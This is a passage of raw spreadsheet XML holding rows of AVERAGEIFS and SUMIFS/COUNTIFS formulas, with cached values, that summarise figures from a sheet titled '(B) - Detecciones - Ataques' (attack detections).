      <c r="AH166" s="352" t="s">
        <v>2590</v>
      </c>
      <c r="AI166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.01213592233</v>
      </c>
      <c r="AJ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>4</v>
      </c>
      <c r="AL166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>2.210526316</v>
      </c>
      <c r="AR166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>42.66666667</v>
      </c>
      <c r="AS166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>6</v>
      </c>
      <c r="AV166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>3.375</v>
      </c>
      <c r="AY166" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>4</v>
      </c>
      <c r="BA166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>26</v>
      </c>
      <c r="BB166" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>30549.66667</v>
      </c>
      <c r="BD166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>2</v>
      </c>
      <c r="BF166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>1.5</v>
      </c>
      <c r="BG166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>1</v>
      </c>
      <c r="BH166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>792</v>
      </c>
      <c r="BI166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>2</v>
      </c>
      <c r="BM166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>361997.0593</v>
      </c>
      <c r="BN166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>135389.6417</v>
      </c>
      <c r="BO166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.004901961</v>
      </c>
      <c r="BR166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>6.5</v>
      </c>
      <c r="BT166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>2.6875</v>
      </c>
      <c r="BZ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>2.162601626</v>
      </c>
      <c r="CA166" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC166" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>5</v>
      </c>
      <c r="CG166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>6</v>
      </c>
      <c r="CI166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>34</v>
      </c>
      <c r="CJ166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>19</v>
      </c>
      <c r="CL166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>85.5</v>
      </c>
      <c r="CN166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>3.625</v>
      </c>
      <c r="CP166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>23</v>
      </c>
      <c r="CQ166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CT166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>1</v>
      </c>
      <c r="CW166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>9</v>
      </c>
      <c r="CY166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>2</v>
      </c>
      <c r="CZ166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH166" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.064444444</v>
      </c>
      <c r="DI166" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ166" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EY$3:$EY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.727272727</v>
      </c>
      <c r="DK166" s="271"/>
    </row>
    <row r="167">
      <c r="J167" s="277"/>
      <c r="K167" s="512"/>
      <c r="L167" s="512"/>
      <c r="M167" s="512"/>
      <c r="N167" s="512"/>
      <c r="O167" s="278"/>
      <c r="Q167" s="271"/>
      <c r="R167" s="505" t="s">
        <v>2591</v>
      </c>
      <c r="S167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>1.004449838</v>
      </c>
      <c r="T167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>11.52982456</v>
      </c>
      <c r="V167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>14.125</v>
      </c>
      <c r="W167" s="540">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>42</v>
      </c>
      <c r="X167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>1</v>
      </c>
      <c r="Y167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>161.25</v>
      </c>
      <c r="Z167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>264850.3014</v>
      </c>
      <c r="AA167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>3.889770261</v>
      </c>
      <c r="AB167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>32.3125</v>
      </c>
      <c r="AC167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>14.65</v>
      </c>
      <c r="AD167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>4.400998004</v>
      </c>
      <c r="AE167" s="522">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>3.56</v>
      </c>
      <c r="AF167" s="523">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GO$3:$GO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>11.70237374</v>
      </c>
      <c r="AG167" s="271"/>
      <c r="AH167" s="505" t="s">
        <v>2591</v>
      </c>
      <c r="AI167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.02669902913</v>
      </c>
      <c r="AJ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>1</v>
      </c>
      <c r="AK167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>5</v>
      </c>
      <c r="AL167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AN167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AO167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AP167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AQ167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>2.226315789</v>
      </c>
      <c r="AR167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>43.83333333</v>
      </c>
      <c r="AS167" s="541" t="s">
        <v>12</v>
      </c>
      <c r="AT167" s="528">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GO$3:$GO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU167" s="528">
